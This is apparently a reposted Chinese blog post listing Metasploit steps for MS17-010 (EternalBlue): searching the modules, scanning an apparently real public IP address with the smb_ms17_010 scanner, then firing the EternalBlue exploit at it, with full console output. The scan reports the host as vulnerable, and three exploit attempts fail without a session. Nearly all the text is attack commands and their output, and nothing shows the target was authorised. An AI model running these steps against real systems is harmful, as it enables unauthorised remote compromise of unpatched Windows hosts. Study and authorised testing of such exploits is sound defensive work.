ms17-010渗透测试操作步骤
作者:互联网
使用的命令
search ms17-010
use auxiliary/scanner/smb/smb_ms17_010
show options
set RHOSTS 47.92.84.135
run
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 47.92.84.135
exploit
详情
msf5 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 47.92.84.135
RHOSTS => 47.92.84.135
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 47.92.84.135:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] 47.92.84.135:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 47.92.84.135
RHOSTS => 47.92.84.135
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 172.17.0.2:4444
[+] 47.92.84.135:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] 47.92.84.135:445 - Connecting to target for exploitation.
[+] 47.92.84.135:445 - Connection established for exploitation.
[+] 47.92.84.135:445 - Target OS selected valid for OS indicated by SMB reply
[*] 47.92.84.135:445 - CORE raw buffer dump (53 bytes)
[*] 47.92.84.135:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 47.92.84.135:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[*] 47.92.84.135:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P
[*] 47.92.84.135:445 - 0x00000030 61 63 6b 20 31 ack 1
[+] 47.92.84.135:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 47.92.84.135:445 - Trying exploit with 12 Groom Allocations.
[*] 47.92.84.135:445 - Sending all but last fragment of exploit packet
[*] 47.92.84.135:445 - Starting non-paged pool grooming
[+] 47.92.84.135:445 - Sending SMBv2 buffers
[+] 47.92.84.135:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 47.92.84.135:445 - Sending final SMBv2 buffers.
[*] 47.92.84.135:445 - Sending last fragment of exploit packet!
[*] 47.92.84.135:445 - Receiving response from exploit packet
[+] 47.92.84.135:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 47.92.84.135:445 - Sending egg to corrupted connection.
[*] 47.92.84.135:445 - Triggering free of corrupted buffer.
[-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 47.92.84.135:445 - Connecting to target for exploitation.
[+] 47.92.84.135:445 - Connection established for exploitation.
[+] 47.92.84.135:445 - Target OS selected valid for OS indicated by SMB reply
[*] 47.92.84.135:445 - CORE raw buffer dump (53 bytes)
[*] 47.92.84.135:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 47.92.84.135:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[*] 47.92.84.135:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P
[*] 47.92.84.135:445 - 0x00000030 61 63 6b 20 31 ack 1
[+] 47.92.84.135:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 47.92.84.135:445 - Trying exploit with 17 Groom Allocations.
[*] 47.92.84.135:445 - Sending all but last fragment of exploit packet
[*] 47.92.84.135:445 - Starting non-paged pool grooming
[+] 47.92.84.135:445 - Sending SMBv2 buffers
[+] 47.92.84.135:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 47.92.84.135:445 - Sending final SMBv2 buffers.
[*] 47.92.84.135:445 - Sending last fragment of exploit packet!
[*] 47.92.84.135:445 - Receiving response from exploit packet
[+] 47.92.84.135:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 47.92.84.135:445 - Sending egg to corrupted connection.
[*] 47.92.84.135:445 - Triggering free of corrupted buffer.
[-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 47.92.84.135:445 - Connecting to target for exploitation.
[+] 47.92.84.135:445 - Connection established for exploitation.
[+] 47.92.84.135:445 - Target OS selected valid for OS indicated by SMB reply
[*] 47.92.84.135:445 - CORE raw buffer dump (53 bytes)
[*] 47.92.84.135:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 47.92.84.135:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[*] 47.92.84.135:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P
[*] 47.92.84.135:445 - 0x00000030 61 63 6b 20 31 ack 1
[+] 47.92.84.135:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 47.92.84.135:445 - Trying exploit with 22 Groom Allocations.
[*] 47.92.84.135:445 - Sending all but last fragment of exploit packet
[*] 47.92.84.135:445 - Starting non-paged pool grooming
[+] 47.92.84.135:445 - Sending SMBv2 buffers
[+] 47.92.84.135:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 47.92.84.135:445 - Sending final SMBv2 buffers.
[*] 47.92.84.135:445 - Sending last fragment of exploit packet!
[*] 47.92.84.135:445 - Receiving response from exploit packet
[+] 47.92.84.135:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 47.92.84.135:445 - Sending egg to corrupted connection.
[*] 47.92.84.135:445 - Triggering free of corrupted buffer.
[-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 47.92.84.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/ms17_010_eternalblue) >
标签:47.92,445,010,exploit,ms17,84.135,操作步骤,smb 来源: https://www.cnblogs.com/liuhuan086/p/13068752.html